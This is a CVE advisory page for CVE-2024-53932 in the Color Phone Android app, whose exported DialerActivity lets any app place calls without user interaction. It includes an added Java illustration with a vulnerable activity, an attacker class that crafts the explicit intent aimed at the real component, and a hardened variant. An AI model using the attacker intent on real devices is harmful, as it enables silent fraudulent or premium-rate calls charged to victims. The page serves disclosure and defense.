CVE-2024-53932
Published: 06 January 2025
Description
The com.remi.colorphone.callscreen.calltheme.callerscreen (aka Color Phone: Call Screen Theme) application through 21.1.9 for Android enables any application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.remi.colorphone.callscreen.calltheme.callerscreen.dialer.DialerActivity component.
Security Summary
CVE-2024-53932 is a critical vulnerability in the Color Phone: Call Screen Theme Android application (package name com.remi.colorphone.callscreen.calltheme.callerscreen) through version 21.1.9. The issue stems from the com.remi.colorphone.callscreen.calltheme.callerscreen.dialer.DialerActivity component, which can be reached by any other application on the device, even one holding no permissions at all, and which silently initiates a phone call when it receives a crafted intent. This is the classic permission re-delegation (confused deputy) pattern: the exported component lends the vulnerable app's own calling capability to a caller that has none. The record links the flaw to CWE-732 (Incorrect Permission Assignment for Critical Resource) and CWE-922 (Insecure Storage of Sensitive Information).
The vulnerability carries a CVSS v3.1 base score of 9.1 (Critical) with the vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N: low attack complexity, no privileges and no user interaction. Note that although the recorded vector rates the attack vector as Network, the attack path actually described requires a malicious application already installed on the same device, which corresponds to a Local attack vector; read the 9.1 as the published figure rather than as evidence of remote exposure. Once such an application is installed it can place arbitrary phone calls without the user's knowledge or consent, enabling fraud, harassment, or premium-rate call scams that incur charges to the victim.
Advisories and further details, including potential mitigation guidance, are available at https://github.com/actuator/com.remi.colorphone.callscreen.calltheme.callerscreen/blob/main/CVE-2024-53932.
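The following is an added illustration and is not code from the Color Phone app (whose source is not on this page) or from the linked advisory. It shows the generic permission re-delegation pattern the description implies, the single explicit intent a zero-permission attacker app needs to aim at the component named above, and a hardened variant. The tel: data URI and the internal use of ACTION_CALL are assumptions about how such a dialer activity would work; the extras the real DialerActivity actually parses are not stated here.

```java
// Added example (not the Color Phone app's or the advisory's code). Apart from the
// DialerActivity component string taken from the advisory, class names are illustrative,
// and the tel: data URI / ACTION_CALL internals are assumptions about such an activity.
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

/**
 * Vulnerable pattern: an exported activity that trusts whatever intent reaches it and
 * turns it into ACTION_CALL. Because the dialer app itself holds CALL_PHONE, the call
 * goes out immediately under the app's grant, so the sender needs no permission at all.
 */
class VulnerableDialerActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri target = getIntent().getData();          // fully attacker-controlled
        if (target != null && "tel".equals(target.getScheme())) {
            startActivity(new Intent(Intent.ACTION_CALL, target)); // no confirmation UI
        }
        finish();
    }
}

/** What a zero-permission attacker app does: one explicit intent at the exported component. */
final class AttackerSide {
    static final String PKG = "com.remi.colorphone.callscreen.calltheme.callerscreen";
    static final String CLS = PKG + ".dialer.DialerActivity";   // component named in the advisory

    static Intent craft(String number) {
        Intent i = new Intent();
        i.setClassName(PKG, CLS);                 // explicit target: no intent filter match needed
        i.setData(Uri.parse("tel:" + number));    // assumed payload shape
        i.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        return i;
    }

    static void fire(Context ctx, String number) {
        // The attacker's own manifest declares no <uses-permission> at all.
        ctx.startActivity(craft(number));
    }
}

/**
 * Hardened pattern, two independent layers:
 *  1. Manifest (XML, not shown here): android:exported="false", or, if other apps must
 *     legitimately start it, android:permission="android.permission.CALL_PHONE" so the
 *     caller has to hold the very permission the activity would otherwise lend out.
 *  2. Code: never upgrade an untrusted request to ACTION_CALL. ACTION_DIAL opens the
 *     system dialer with the number prefilled; the user must tap "call", and it needs
 *     no permission, so there is nothing left to re-delegate.
 */
class HardenedDialerActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Uri target = getIntent().getData();
        if (target == null || !"tel".equals(target.getScheme())) {
            finish();
            return;
        }
        startActivity(new Intent(Intent.ACTION_DIAL, target));
        finish();
    }
}
```

To triage an installed build, pull the APK and print its manifest (for example with `apkanalyzer manifest print app.apk` from the Android SDK command-line tools) and look at the DialerActivity declaration: `android:exported="true"`, or an intent-filter with no explicit exported attribute on a build targeting an SDK below 31, combined with no `android:permission` attribute, is the exposure the description implies.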
Details
- CWE(s)